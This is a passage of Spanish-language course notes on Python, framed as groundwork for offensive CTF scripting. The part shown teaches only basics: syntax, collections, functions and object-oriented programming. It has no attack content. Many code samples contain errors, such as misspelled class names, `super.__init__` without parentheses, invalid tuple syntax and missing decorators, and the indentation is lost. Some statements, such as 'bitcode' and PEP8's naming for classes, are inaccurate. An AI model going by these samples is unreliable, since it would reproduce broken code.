Python Ofensivo - Notas prácticas
Esta publicación tiene los apuntes y notas sobre el tema Python Ofensivo de nivel introductorio orientado en Python3 donde se presenta el siguiente temario:
La materia tiene un enfoque orientado a seguridad informática para desplegar scripts al momento de realizar CTF en plataformas como Hack The Box.
Índice
- Introducción a Python
- Conceptos Básicos
- Colecciones y Estructuras de Datos
- Programación Orientada a Objetos
- Módulos y Paquetes
- Entrada y Salida de Datos
- Proyectos de POO para reforzar
- Biblioteca Estándar y Herramientas
- Manejo de librerías Comunes
- Desarrollo de aplicaciones de escritorio
- Python Ofensivo
Se harán prácticas y proyectos antes de ir a la parte ofensiva, primero tener una soltura en Python para ir a conceptos más avanzados. Adquirir un buen nivel dentro de la practica.
Introducción a Python
Historia y filosofía de Python
La filosofía que dio su desarrollo y porque este lenguaje es tan completo. En 1989 nació Python con la capacidad de expresar conceptos con menos líneas de código que los lenguajes comunes de aquella época como C o Java.
Python debía centrarse en hacer más fácil las tareas del programador, la filosofía de Python se resume en el documento The Zen of Python.
Características y Ventajas
Es un lenguaje de alto nivel e interpretado, ya que se ejecuta mediante un interprete sin ser compilado, se traduce a código máquina en tiempo real mientras se ejecuta el programa, por eso Python es interpretado. Python es fácil de leer y escribir incluso para los principiantes permitiendo Programación orientada a objetos, Programación Imperativa y Programación Funcional. La imperativa es un estilo de programación centrado en escribir como se deben hacer las operaciones para obtener un resultado.
Programación Imperativa
def suma_imperativa(lista):
total = 0
for num in lista:
total += num
return total
print(suma_imperativa([1, 2, 3, 4, 5]))
Se compone de una serie de instrucciones que modifican el estado del programa, La variable va cambiando mediante avanza el programa.
La Programación Funcional se compone de una serie de evaluaciones de funciones que no modifican el estado del programa.
Programación Funcional
from functools import reduce
def suma_funcional(lista):
return reduce(lambda x, y: x + y, lista)
print(suma_funcional([1, 2, 3, 4, 5]))
Siendo estas las diferencias entre estos dos enfoques de programación, por eso es excelente para una gran variedad de tareas.
Es muy versátil y sencillo para las tareas de Hacking ético.
Diferencias entre Python2 y Python3, PIP2 Y PIP3
Python2 y Python3 son versiones del lenguaje de programación y los PIP2 Y PIP3 son las herramientas de gestión de paquetes Instalan y administran tanto bibliotecas y dependencias.
Python3 tuvo la fecha de lanzamiento en el 2008, durante todo el curso se usará Python3. Para instalar
sudo apt install python2 python3
Y para saber la versión se hace
python2 --version
python3 --version
Es recomendable tener Python2 puesto que, en algún momento no es de extrañar que un Script este programado en versiones antiguas del lenguaje y halla que adaptarlo a Python3.
En Python2 print funciona como una declaración, no como una función.
print "Hola Mundo"
En Python3,
print("Hola Mundo")
Y así hay muchas mas funciones que antes eran declaraciones, por tanto hay que estar pendiente del código al revisarlo.
Python2 utiliza ASCII, y Python3 trabaja con Unicode.
Los PIP provienen de Pips Installs Packages.
sudo apt install python3-pip
Y para Pip2,
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
Para instalar un paquete se hace
pip3 install pwntools
pip2 install pwntools
Conceptos Básicos
El intérprete de Python
El intérprete es el corazón del lenguaje, es el motor que ejecuta el código. Es el encargado de leer y ejecutar el código en tiempo real. Todo el código es ejecutado línea por línea, los programas y Scripts tienen el formato .py y previamente a la compilación se convierte en bitcode mejorando el rendimiento.
Podemos usar,
python3 -c " "
Shebang y Convenios en Python
Son aspectos importantes que facilitan la escritura de Scripts.
Shebang en Python se incluye al principio del Script, ya que este le indica al Sistema Operativo con que intérprete debe ejecutarse el archivo en cuestión. Donde el Shebang más común es,
Para Linux
#!/usr/bin/env python3
El
envbusca en el Path el binario de Python.
Para Windows,
#!"C:\Python33\python.exe"
¿Donde utilizamos el entorno `env`?
Para proyectos que requieran versiones especificas de paquetes instaladas mediante los PIP2 o PIP3, y para encontrar la ubicación del binario de Python3. El caso Windows es similar pero, solo para encontrar las versiones especificas de los paquetes con los que se va a trabajar, ya que el Shebang de Windows llama la ubicación del .exe en donde se encuentre el binario instalado.
Los convenios de codificación son las recomendaciones que guían para escribir código claro y consistente, siendo PEP8 el más conocido.
PEP8 abarca:
• Nombres de variables: Utilizar lower_case_with_underscore para nombres de variables y funciones. Utilizar el UPPER_CASE_WITH_UNDERSCORE para constantes y camelCase para las clases. • Longitud de las líneas: Limitar a 79 caracteres y 72 para comentarios • Indentación: Usar 4 espacios por nivel de indentación
Convenio PEP8
#!/usr/bin/env python3
#clase5_shebang
def comprobacionEstadoApi():
# lowerCamelCase
class TwitterApi:
# UpperCamelCase
# PEP 8
def comprobar_estado_api():
# snake_case
# SCREAMING_SNAKE_CASE
# Para constantes
VERSION_API = 1
URL_API = "https://google.com"
# Variable protegida
_protegido
# Variable privada
__privado
if __name__ == '__main__':
print("Hola, soy el modulo principal")
else:
print("No soy el modulo principal")
#!/usr/bin/env python3
import clase5_shebang
Definición de un modulo principal
if __name__ == '__main__':
Se utiliza para definir el script como modulo principal, es útil para tener mejor organizado y limpio el código.
Variables y tipos de datos
Strings, Enteros, Floats, Protegidos, Privados
Listas son colecciones ordenadas y mutables que pueden contener elementos de diferentes tipos
Listas
my_ports = []
my_ports.append(22)
my_ports.extend([21,84])
for port in my_ports:
print(port)
Para trabajar los tamaños tenemos la función len().
Algunos métodos para listas
.count(num) -> Contar ocurrencias
.insert(pos, valor_numero) -> Agregar un número
.pop() -> Elimina el último número
.index(num) -> Saber índice de primera ocurrencia
String Formatting
String Formatting
print(f"Hola{variable}")
print(f"[+] El puerto {my_ports[0]} está abierto")
my_ports += sorted(my_ports)
Listas y formateo de cadenas
#!/usr/bin/env python3
ip_address = "192.168.0.17"
print(ip_address)
print(type(ip_address))
port = 80
print(port)
print(type(port))
number = 4.5
print(number)
print(type(number))
print(int(number))
print(type(int(number)))
# Concepto Listas -> Array
my_ports = []
my_ports.append(22) # Primer Elemento
my_ports.append(80)
my_ports.append(443)
# Extiende la lista
my_ports.extend([22, 21, 84, 85])
my_ports += [8080, 87]
print(my_ports[0]) # -> Acceder al indice de la lista
for port in my_ports:
print("El puerto " + str(port))
#print("El total de elementos en la lista es de: " + str(len(my_ports)))
print(f"El total de elementos en la lista es de: {len(my_ports)} elementos")
# Se ordena
my_ports = sorted(my_ports)
# Eliminar
del my_ports[1]
for port in my_ports:
print(f"El puerto ordenado : {port}")
Operadores Básicos en Python
Suma, Resta, Multiplicación, División, residuos y el exponente es usando **
2 ** 3 = 8
Operadores básicos
#!/usr/bin/env python3
#clase 8 Operadores Basicos
# a + b, a - b, a ** b, a/b, a%b
first_number = 222
second_number = 4
result = first_number ** second_number
print("{:,}".format(result).replace(",","."))
# Cadenas
first_str = "Hola"
second_str = " "
third_str = "Mundo!"
print(first_str + second_str + third_str)
print(first_str * 3)
print(first_str[0] * 3)
print(third_str[0:3] * 8)
# Listas
odd_numbers = [1, 3, 5, 7, 9]
even_numbers = [2, 4, 6, 8, 10]
result = odd_numbers + even_numbers
print(result)
# ZIP
result = zip(odd_numbers, even_numbers) # -> crea objeto
# MAP -> iterador de cada tupla hecha por zip y aplicar operatorias
result = list(map(sum, zip(odd_numbers, even_numbers))) # -> sum suma
print(result)
for element in result:
print(element)
Operaciones con Cadenas
Cadenas 1
#!/usr/bin/env python3
name = "juan"
rol = "ingeniero"
edad = 20
# Concatenar y type casting
print("Hola mi nombre es " + name + "y soy un " + rol + ". Actualmente tengo " + str(edad) + "años.")
# Usando punteros con prioridades
print("Hola mi nombre es %s y soy un %s. Actualmente tengo %d años." % (name, rol, edad))
# Usando format con posiciones
print("Hola mi nombre es {} y soy un {}. Actualmente tengo {} años.".format(name, rol, edad))
# Usando format mediante indices posicionales para asignar texto
print("Hola mi nombre es {0} y soy un {0}. Actualmente tengo {0} años.".format(name, rol, edad))
# Usando f-strings y nombrando directamente la variable
print(f"Hola mi nombre es {name} soy un {rol}. Actualmente tengo {edad}")
Operaciones para Listas
Listas 1
#!/usr/bin/env python3
# Bucles for
nombres = ["alicia", "ekaterina", "nastya", "katerina"]
animals = ["perro" , "gato", "pez", "colibri"]
frutas = {"manzanas" : 3, "uvas" : 7, "bananos" : 5, "mangos" : 10}
my_list = [[2, 4, 6, 8], [1, 3, 5, 7]]
# Iterada de 0 a 4 -> igual a un seq en Bash
for i in range(5):
print(i)
# Iteracion en lista
for animal in animals:
print(f"El animal en esta iteracion es {animal}")
# Bucles while
i = 0
while i < 5:
print("El valor de i para esta iteracion es {}".format(i))
i = i + 1
# Usando enumerate -> crea un objeto que es iterable
# Retorna indice y elemento
for i, nombre in enumerate(nombres):
print("Para la iteracion %d, el nombre es: %s" % (i + 1, nombre))
# Iteracion en diccionarios
for key, value in frutas.items():
print(f"Hay {value} cantidad de la fruta {key}")
# Bucles anidados
for element in my_list:
for element_in_list in element:
print(element_in_list)
# Listas de comprension
odd_list = [1, 3, 5, 7, 9]
cuadrado_de_odd_list = [i ** 2 for i in odd_list]
print(cuadrado_de_odd_list)
# Break, Continue y else's en bucles
print("\n")
for i in range(10):
if i == 5:
break # rompe
print(i)
print("\n")
for i in range(10):
if i == 5:
continue # salta a la siguiente iteracion
print(i)
# Uso de else en for
for i in range(10):
if i == 10:
break
else:
print("Bucle concluido exitosamente")
# -------------------
print("continua el flujo del programa exitosamente")
# While
i = 0
while i < 10:
if i == 10:
break
i += 1
else:
print("Bucle while concluido exitosamente")
Zip: Toma dos o más listas y las empareja, creando una lista de tuplas. Cada tupla contiene elementos de las listas originales que ocupan la misma posición. Map: Aplica la función especifica a cada elemento de un iterable, transforma datos
String formatting, funciones e ámbitos de las variables y Lambdas anónimas
El string formatting consiste en darle un formato a las cadenas y los resultados.
print("{;,}".format(resultado).replace(",","."))
Zip permite crear el formato tupla:
(1,2)
(3,4)
(5,6)
(7,8)
(9,10)
Map permite crear un iterador de cada tupla, permitiendo crear operatorias:
map(sum,zip(1,2))
Hay una regla para el formateo de cadenas y está requiere el operador porcentaje (%s %d %f):
print(f"hola soy%s" %name)
print("hola mi nombre es {name}")
print("hola mi nombre es {}".format(name))
Las funciones son bloques de código reutilizables para una tarea especifica. Usan def y return.
El ámbito o scope se refiere a si una variable es local o global. Internamente la global efectua cambios globales.
Por otro lado, las funciones lambda anónimas permite simplificar código mediante expresiones.
Funciones 1
#!/usr/bin/env python3
from functools import reduce
# Ambito de las variables
variable = "Soy global"
def funcion():
print("Soy funcion y mi contenido de variable es: %s " % variable)
def funcion2():
variable = "Soy local"
print("Soy funcion2 y mi contenido ha sido editado local, {}".format(variable))
def funcion3():
global variable
variable = "Soy global pero he sido modificado con 'global'"
print(f"Soy funcion3 y usando 'global' el contenido de variable es: {variable}")
print(variable)
funcion()
funcion2()
funcion3()
print("Se ha terminado ambito de variables, valor resultante de 'variable es {}'".format(variable))
# uso de funciones
def mi_funcion():
print("Hola Mundo")
mi_funcion()
def saludo(nombre):
print("Hola {}, un saludo!".format(nombre))
saludo("convolk")
saludo("nastya")
def suma(x, y):
return x+y
print("La suma de los numeros es %d" % suma(8,10))
# uso de funciones lambda anonimas
mi_suma = lambda x,y: x+y
print("Usando lambda la suma es {}".format(mi_suma(6,4)))
lista = [1, 2, 3, 4, 5]
# Cuadrado de cada elemento usando lambda
cuadrado = list(map(lambda x: x**2, lista))
print(f"Los cuadrados de {lista} son : {cuadrado}")
# Numeros pares o impares
numeros = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
pares = list(filter(lambda x: x % 2 == 0, numeros))
impares = list(filter(lambda y: y % 2 != 0, numeros))
print(f"Los numeros pares son {pares}")
print("Los numeros impares son {}".format(impares))
# Producto de un numero
numeros = [1, 2, 3, 4, 5]
producto = reduce(lambda x, y: x*y, numeros)
print(f"El ultimo producto de la lista es: {producto}")
Colecciones y estructuras de datos
Listas y Tuplas
Las listas permiten almacenar secuencias ordenadas de elementos (mutables), lo que significa que podemos modificar las listas después de su creación, y son dinámicas, permitiéndonos añadir o quitar elementos de ellas
Operaciones con listas:
Añadir elementos -> .append(), .extend()
Eliminar elementos -> .remove(), .pop()
Ordenar elementos -> .sort(), .sorted(), .reverse(), [::-1]
Listas 2
#!/usr/bin/env python3
# Repaso listas
cve_list = ['CVE-2023', 'CVE-2021', 'CVE-2024']
puertos_tcp = [21, 22, 25, 80, 443, 8080, 445, 69]
print(puertos_tcp)
print(len(puertos_tcp))
puertos_tcp.append(80)
print(len(puertos_tcp))
for puerto in puertos_tcp:
print("Este es el puerto: {}".format(puerto))
print(cve_list)
cve_list.remove('CVE-2023')
print(cve_list)
# ordenar
puertos_tcp.sort()
print(f"Los puertos ordenados son: {puertos_tcp}")
puertos_tcp.reverse()
print("Se han revertido los puertos: {}".format(puertos_tcp))
# Poner listas en mayuscula
# animales = ["perro", "gato", "pez"]
# animales_mayus = [animal.upper() for animal in animales]
# animales_minus = [animal.lower() for animal in animales]
# Zip para combinatorias de listas
frutas = ["manzanas", "uvas", "mangos", "kiwis"]
cantidades = [3, 5, 6, 10]
for fruta, cantidad in zip(frutas, cantidades):
print("cantidad %d de %s" % (cantidad, fruta))
Tuplas
#!/usr/bin/env python3
tupla = (1, 2, 3, 4, 5)
print(tupla)
print(type(tupla))
print(tupla[1:3])
print(tupla[:4])
# No podemos modificar la tupla, son inmutables -> estaticas
# asignar
a, b, c, d, e = tupla
print("Valores de %d, %d, %d, %d, %d" % (a, b, c, d, e))
tupla = tupla + (6, 7, 8, 9, 10)
print(tupla)
tupla_pares = tuple(i for i in tupla if i % 2 == 0)
print(tupla_pares)
Conjuntos (Sets)
No tienen orden ni elementos repetidos.
• Adición y eliminación:
.add(), .remove(), .discard(), .update({})
# Para evitar errores con .remove(), usar .discard()
• Intersección:
.intersection() # Para elementos repetidos en 2 conjuntos, ambos
.union() # Compacta y quita repeticiones, todas
Conjuntos 1
#!/usr/bin/env python3
#Conjutos sets {}, -> no guarda repetidos usando el typeCast set(mi_lista)
# Busquedas rapidas -> print(1234 in mi_conjunto) -> retorna true o falseo
# ambas -> intersection
# todas -> union
# diferente -> difference los que no estas en intersection
mi_conjunto = {1, 2, 3}
print(mi_conjunto)
print(type(mi_conjunto))
mi_conjunto.add(4)
mi_conjunto.add(5)
print(mi_conjunto)
mi_conjunto.update({6, 7, 8, 9, 10})
print(mi_conjunto)
mi_conjunto.remove(6)
print(mi_conjunto)
# Alternativa a borrado sin error
mi_conjunto.discard(11)
print(mi_conjunto)
# podemos crear intersecciones -> repetidos
mi_conjunto2 = {4, 5, 6, 11, 12, 13, 14, 15}
resultado = mi_conjunto.intersection(mi_conjunto2)
print(resultado)
# unir conjuntos con union
resultado2 = mi_conjunto.union(mi_conjunto2)
print(resultado2)
# subconjutos
p1_set = {1, 2, 3, 4}
p2_set = {1, 2, 3, 4, 5, 6, 7, 8, 9}
print(p1_set.issubset(p2_set)) # para todos los elementos True
# Basta con que UN SOLO elemento no esté presente, retorna False
Repaso proyecto
#!/usr/bin/env python3
juegos = ["Word of Warcraft", "Diablo 2", "Terraria"]
#Géneros
generos = {
"Word of Warcraft":"RPG",
"Diablo 2":"MMO",
"Terraria":"Aventura"
}
#Ventas y unidades
ventas = {
"Word of Warcraft":(800,200),
"Diablo 2": (500,10),
"Terraria": (200:700)
}
#Clientes
clientes = {
"Word of Warcraft": {"zylem", "zokkz", "camcy", "liandd"},
"Diablo 2": {"pypByter", "unkn0wn"},
"Terraria": {"paloloco", "alexispropvp", "minfi"}
}
mi_juego = "Word of Warcraft"
def sumario(juego):
#Sumario
print(f"\n[i] Resumen del juego {juego}\n")
print(f"\t[+] Género del juego: {generos[juego]}")
print(f"\t[+] Total de ventas para este juego: {ventas[juego][0]} unidades")
print(f"\t[+] Total de unidades disponibles para este juego: {ventas[juego[1]]}")
print(f"\t[+] Clientes que han adquirido el juego: {', '.join(clientes[juego])}")
for juego in juegos:
sumario(juego)
# Ventas mayores a 500
for juego in juegos:
if ventas[juego][0] > 500:
sumario(juego)
ventas_mayores_a_500 = lambda: sum(units for juego, (sells,_) in ventas.items() if ventas[juego] > 500)
# Lambda para representar un conteo total de ventas
ventas_totales = lambda: sum(sells for sells, _ in ventas.values())
print(f"[i] El total de ventas de todos los productos es {ventas_totales()}")
Programación Orientada a Objetos
Clases y objetos
La programación orientada a objetos es un paradigma, empleando clases y objetos permitiendo la modularidad para hacer un código más estructurado.
OOP (Object Oriented Programming)
¿Qué es una clase?
Podemos verlo como una plantilla base en la cual hay definida una serie de atributos y métodos para definir un objeto.
Estos ‘objetos’ son instancias de la clase, o la plantilla para ser representada.
Clases 1
#!/usr/bin/env python3
class Persona:
# Los métodos son funciones internas de la clase, el primero que se crea se llama constructor,
esto se hace para que se inicialice el objeto con los atributos de la clase.
def __init__(self, nombre, edad): # El uso de self hace referencia al objeto que se le pasa
self.nombre = nombre
self.edad = edad
def saludo(self):
return f"Hola, soy{self.nombre} y tengo {self.edad}.\n"
# Después de tener la clase, se crea un objeto Persona
Tony = Persona("Tony", 28)
print(Tony.saludo())
Clases 2
#!/usr/bin/env python3
class Animal:
# En caso de necesitar variables se establecen aquí arriba, antes del constructor
def __init__(self, nombre, tipo):
self.nombre = nombre
self.tipo = tipo
def descripcion(self):
return f"{self.nombre} es un {self.tipo}"
gato = Animal("Sasha", "Gato")
perro = Animal("Toby", "Perro")
print(gato.descripcion())
Clases 3
#!/usr/bin/env python3
class CuentaBancaria:
def __init__(self, cuenta, nombre, dinero=0): # Si no se le pasa ningun argumento, valdrá 0
self.cuenta = cuenta
self.nombre = nombre
self.dinero = dinero
def depositar_dinero(self, dinero):
self.dinero += dinero # Se le suma el dinero que ya tenia '1000' + '500'
print(f"[i] Se han depositado {dinero}, el dinero total es {self.dinero}")
def retirar_dinero(self, retiro):
if self.dinero > retiro:
self.dinero -= retiro
print(f"[i] Se han retirado {retiro}, el dinero total es {self.dinero}")
else:
print(f"[!] No se puede retirar, ¡Negado!")
sanchez = CuentaBancaria("1293182093", "Manuel Sanchez", 1000)
sanchez.depositar_dinero(500)
sanchez.retirar_dinero(900)
Clases y Decoradores 1
#!/usr/bin/env python3
class Rectangulo:
def __init__(self, ancho, alto):
self.ancho = ancho
self.alto = alto
# Método normal
def calcular_area(self):
return self.ancho * self.alto
# Usando decoradores
@property
def area(self): # Acceder al resultado directamente
return self.ancho * self.alto
# Otro método especial es __str__ # Para indicar que quiero que muestre
def __str__(self):
return f"\n[i] Propiedades del rectángulo: [Ancho: {self.ancho}][Alto: {self.alto}]"
# Otro método especial es __eq__ de igualdad, para saber si los objetos son iguales
def __eq__(self, otro):
return self.ancho == otro.ancho and self.alto == otro.alto
rectangulo1 = Rectangulo(20, 80)
rectangulo2 = Rectangulo(15, 60)
print(f"[+] El área es {rectangulo1.area}") # Sin colocar los parentesis, para acceder al valor del atributo como tal
print(f"[+] ¿Son iguales? -> {rectangulo1 == rectangulo2}")
Clases y Decoradores 2
#!/usr/bin/env python3
class Libro:
IVA = 0.51
best_seller = 5000
def __init__(self, titulo, autor, precio):
self.titulo = titulo
self.autor = autor
self.precio = precio
def es_best_seller(self, ventas):
return ventas > Libro.best_seller
# Operaciones puntuales, y no pueden acceder a los atributos a menos que le pase como argumento la instancia del objeto
@staticmethod
def es_best_seller(total):
return total > Libro.best_seller
# Precio con iva
# Con @staticmethod
@staticmethod
def precio_con_iva(precio):
return precio + precio * Libro.IVA
# Con @classmethod -> recibe como argumento la clase con 'cls'
def precio_con_iva(cls, precio):
return precio + precio * cls.IVA
mi_libro = Libro("Aves Negras", "Juan García", 15000)
print(mi_libro.es_best_seller(6000)) # Normal
print({Libro.es_best_seller(6000)}) # @staticmethod
print({Libro.precio_con_iva(mi_libro.precio)})
print({Libro.precio_con_iva(mi_libro.precio)})
Métodos estáticos y de clase
Refuerzo sobre los métodos @staticmethod y @classmethod.
Clases y Decoradores 3
#!/usr/bin/env python
# Acceder directamente a los métodos sin crear objetos
#@staticmethod
class Calculadora:
@staticmethod
def suma(num1, num2):
return num1 + num2
@staticmethod
def resta(num1, num2):
return num1 - num2
@staticmethod
def multiplicar(num1, num2):
return num1 * num2
@staticmethod
def division(num1, num2):
return num1 / num2 if num2 != 0 else "[!] Error Division por cero."
print(Calculadora.suma(2, 8))
print(Calculadora.resta(8, 4))
print(Calculadora.multiplicar(7, 12))
print(Caculadora.division(13, 0))
Clases y Decoradores 4
#!/usr/bin/env python3
class Automovil:
def __init__(self, marca, modelo):
self.marca = marca
self.modelo = modelo
@classmethod
def deportivo(cls, marca):
return cls(marca, "Deportivo")
# Es lo mismo que Automovil("Ferrari", "Deportivo"), es igual que usar un constructor con parametros
# Se requiere el __str__
def __str__(self):
return f"La marca {self.marca} es un modelo {self.modelo}"
vehiculo1 = print(Automovil.deportivos("Ferrari")
Usando variables de clase:
Clases y Decoradores 5
#!/usr/bin/env python3
class Estudiante:
estudiantes = []
def __init__(self, nombre, edad):
self.nombre = nombre
self.edad = edad
Estudiantes.estudiantes.append(self)
@staticmethod
def es_mayor_de_edad(edad):
return edad > 18
@classmethod
def crear_estudiante(cls, nombre, edad):
if cls.es_mayor_de_edad(edad):
return cls(nombre, edad) # Es como llamar al constructor con parametros, es igual que crear objetos locales dentro de la clase
else:
print(f"[!] Error, el estudiante {nombre}, es menor de edad")
@staticmethod
def mostrar_estudiante():
for i, estudiante in enumerate(Estudiantes.estudiante):
print(f"[+] El estudiante [{i+1}]: {estudiante.nombre}")
# Para usar con @classmethod
Estudiantes.crear_estudiante("zylem", 23)
Estudiantes.crear_estudiante("zokks", 18)
Estudiantes.crear_estudiante("unkn0nw", 1122)
Estudiantes.crear_estudiante("bochim", 22)
Estudiantes.mostrar_estudiantes()
Uso de Self
Refuerzo para comprender mejor el uso de self.
Retocar y editar objetos requiere el uso de self
Self 1
#!/usr/bin/env python
class Persona:
# Self hace referencia al objeto que se está creando
def __init__(self, nombre, edad):
self.nombre = nombre
self.edad = edad
def presentacion(self):
return f"{self.nombre} te ha saludado!"
ekaterina = Persona("Ekaterina", 26)
# Se está haciendo: Persona.__init__(ekaterina: obj, "Ekaterina" : str, 26 : int)
print(ekaterina.presentacion())
Self 2
#!/usr/bin/env python3
class Calculadora:
def __init__(self, numero):
self.numero = numero
calc = Calculadora(5)
Herencia y Polimorfismo
Estos son nuevos conceptos, siendo a muy resumidas cuentas la Herencia una clase que hereda de otra clase ya existente:
Herencia
#!/usr/bin/env python3
class Animal:
def __init__(self, nombre):
self.nombre = nombre
def hablar(self):
pass # Se convierte en un método abstracto, para utilizarlos después en una subclase que incluya este método
# Otra forma es:
raise NotImplementedError("Las subclases definidas deben implentar este método")
class Gato(Animal):
# "Se sobreescribe" el método
def hablar(self):
return f"{self.nombre} dice !Miau¡"
class Perro(Animal):
# "Se sobreescribe" el método, pero esto no significa que el método de la clase Gato se cambie para perros.
def hablar(self):
return f"{self.nombre} dice !Woof¡"
gato = Gato("kiki")
perro = Perro("candy")
print(gato.hablar())
print(perro.hablar())
Ahora, para polimorfismo estamos llamando directamente al método, fuera de las clases se hace una función, recibe el objeto:
Herencia y Polimorfismo
#!/usr/bin/env python3
class Animal:
def __init__(self, nombre):
self.nombre = nombre
def hablar(self):
pass # Se convierte en un método abstracto, para utilizarlos después en una subclase que incluya este método
# Otra forma es:
raise NotImplementedError("Las subclases definidas deben implentar este método")
class Gato(Animal):
# "Se sobreescribe" el método
def hablar(self):
return f"!Miau¡"
class Perro(Animal):
# "Se sobreescribe" el método, pero esto no significa que el método de la clase Gato se cambie para perros.
def hablar(self):
return f"!Woof¡"
gato = Gato("kiki")
perro = Perro("candy")
print(gato.hablar())
print(perro.hablar())
def hacer_hablar(objeto):
print(f"{objeto.nombre} dice {objeto.hablar()}")
hacer_hablar(gato)
hacer_hablar(perro)
Herencia y Polimorfismo 2
#!/usr/bin/env python3
class Automovil:
def __init__(self, marca, modelo):
self.marca = marca
self.modelo = modelo
def describir(self):
return f"Vehiculo:{self.marca}, {self.modelo}"
coche = Automovil("Nissan", "GTR")
moto = Automovil("AKT", "NKD")
print(coche.describir())
print(moto.describir())
# Ambas diran lo mismo, aunque un objeto sea un coche y el otro una moto.
# Aplicando herencia se hace mucho más modular
class Automovil:
def __init__(self, marca, modelo):
self.marca = marca
self.modelo = modelo
def describir(self):
raise NotImplementedError("Los vehículos deben implementar este método!")
class Coche(Automovil):
def describir(self):
return f"Vehículo: {self.marca}, {self.modelo}"
class Moto(Automovil):
def describir(self):
return f"Moto: {self.marca}, {self.modelo}"
coche = Coche("NISSAN", "GTR")
moto = Moto("AKT", "NKD")
print(coche.describir())
print(moto.describir())
# Ahora aplicando polimorfismo
def describirse(objeto):
return f"{objeto.describir()}"
print(describirse(moto))
print(describirse(coche))
Herencia y Polimorfismo 3
#!/usr/bin/env python3
class Dipositivo:
def __init__(self, modelo):
self.modelo = modelo
def escanear_vulnerabilidades(self):
raise NotImplementedError("Este método debe ser definido para el resto de subclases existentes")
class Ordenador(Dispositivo):
def escanear_vulnerabilidades(self):
return f"[+] Análisis de vulnerabilidades concluido: Actualización de software necesaria"
class Router(Dispositivo):
def escanear_vulnerabilidades(self):
return f"[+] Análisis de vulnerabilidades concluido: Múltiples puertos críticos detectados abiertos"
class TelefonoMovil(Dispositivo):
def escanear_vulnerabilidades(self):
return f"[+] Análisis de vulnerabilidades concluido: Múltiples aplicaciones detectadas con permisos excesivos"
def realizar_escaneo(objeto):
return f"{objeto.escanear_vulnerabilidades}"
pc = Ordenador("Vaio Sony")
router = Router("Tenda F3")
movil = TelefonoMovil("POCO")
print(realizar_escaneo(pc))
print(realizar_escaneo(router))
print(realizar_escaneo(movil))
Hay ocasiones donde queremos que el método en la clase padre no se sobrescriba y es usando constructores:
Herencia 2
#!/usr/bin/env python3
class A:
def __init__(self):
print("Inicializando A")
class B(A):
def __init__(self):
print("Inicializando B")
super.__init__() # Evita sobrescribir el método de la clase A, la cual el constructor es heredado por B
a = A()
#---
b = B() # Aquí se ha sobrescrito el constructor de A, y prevalece el de B
# Cuando nos interese no sobrescribir usamos *super*
Herencia 3
#!/usr/bin/env python3
class A:
def __init__(self, x):
self.x = x
print("El valor de x: {self.x}")
class B(A):
def __init__(self, x, y):
self.y = y
super.__init__(x)
print("El valor de y: {self.y}")
b = B(2, 10)
Herencia 4
#!/usr/bin/env python3
class A:
def saludo(self):
return "Saludo desde A"
class B(A):
def saludo(self):
original = super().saludo()
return f"{original}, pero también saludo desde B"
saludo = A()
print(saludo.saludo())
saludo_b = B()
print(saludo.saludo())
Herencia 5
#!/usr/bin/env python
class Persona:
def __init__(self, nombre, edad):
self.nombre = nombre
self.edad = edad
def saludo(self):
return f"Hola soy {self.nombre}, y tengo {self.edad} años"
katya = Persona("Katya", 23)
print(katya.saludo())
class Empleado(Persona):
def __init__(self, nombre, edad, salario):
super().__init__(nombre, edad)
self.salario = salario
def saludo(self):
original = super().saludo()
return f"{original}, y mi salario es: {self.saludo}"
convolk = Empleado("convolk", 23, 75000)
print(convolk.saludo())
Encapsulamiento y métodos especiales
En el paradigma de la programación orientada a objetos, el encapsulamiento es un método o una estrategia que permite restringir el acceso o ciertas partes de un objeto fuera de la clase.
self.__dinero -> Atributo privado
self._dinero -> Atributo protegido
Encapsulamiento 1
#!/usr/bin/env python3
class Ejemplo:
def __init__(self):
# No visible hacia afuera, se crean una Atributo protegido
self._atributo_protegido = "Soy un atributo protegido, y no deberías poder verme"
# Atributo privado
self.__atributo_privado = "Soy un atributo privado"
ejemplo = Ejemplo()
print(ejemplo._atributo_protegido) # El convenio de python dice que no debe referenciar de está manera los atributos protegido o privados
Esto es conocido como name mangling y lo que hace es retocar un poco el nombre _self._atributo_privado:
Encapsulamiento 2
# Para ver un atributo privado
print(ejemplo._Ejemplo__atributo_privado)
#!/usr/bin/env python3
class Coche:
def __init__(self, marca, modelo):
self.marca = marca
self.modelo = modelo
self.__kilometraje = 0 # Atributo privado
def conducir(self, kilometros):
if kilometros >= 0:
self.__kilometraje += kilometros
else:
print("[!] Los kilometros deben ser mayores a 0\n")
def mostrar_kilometros(self):
return self.__kilometros
coche = Coche("Toyota", "AE86")
coche.conducir(150)
print(coche.mostrar_kilometros())
Breve refuerzo sobre los métodos especiales:
Métodos especiales 1
#!/usr/bin/env python3
class Libro:
def __init__(self, autor, titulo):
self.autor = autor
self.titulo = titulo
def __str__(self):
return f"El libro {self.titulo} ha sido escrito por {self.autor}"
def __eq__(self, otro):
return self.autor == otro.autor and self.titulo == otro.titulo
mi_libro = Libro("Juan García", "Aves Negras")
libro_dos = Libro("Miguel García", "Cadaveres de Gato")
print(mi_libro)
print(f"¿Son iguales ambos libros? -> {mi_libro == libro_dos}")
Encapsulamiento 3
#!/usr/bin/env python3
class CuentaBancaria:
def __init__(self, num_cuenta, titular, saldo_inicial=0):
self.num_cuenta = num_cuenta
self.titular = titular
self.__saldo = saldo_inicial
def depositar_dinero(self, cantidad):
if cantidad > 0:
self.__saldo += cantidad
else:
return "El monto a depositar debe ser mayor a cero"
def retirar_dinero(self, retiro):
if self.__saldo > 0:
if self.__saldo > retiro:
self.__saldo -= retiro
else:
return "No tienes fondos suficientes para retirar"
else:
return "No tienes ni un duro!"
def mostrar_dinero(self):
return f"El saldo actual en la cuenta es {self.__saldo}"
nastya = CuentaBancaria("27346", "Nastya Aovna")
print(nastya.mostrar_dinero())
Métodos especiales 2
#!/usr/bin/env python3
class Caja:
#def __init__(self, ) # ¿De qué manera podemos recibir multiples frutas en una sola variable sin usar listas?
# Se crea una tupla, idependiente de la cantidad de elemetos
def __init__(self, *frutas):
self.frutas = frutas
def mostrar_frutas(self):
for i in self.frutas:
print(i)
# Saber la longitud de la caja sin usar len()
def __len__(self):
return len(self.frutas)
caja = Caja("Manzana", "Kiwi", "Uva", "Fresa")
Métodos especiales (*args) 1
#!/usr/bin/env python3
class Pizza:
def __init__(self, size, *ingredientes):
self.size = size
self.ingredientes = ingredientes
def descripcion(self):
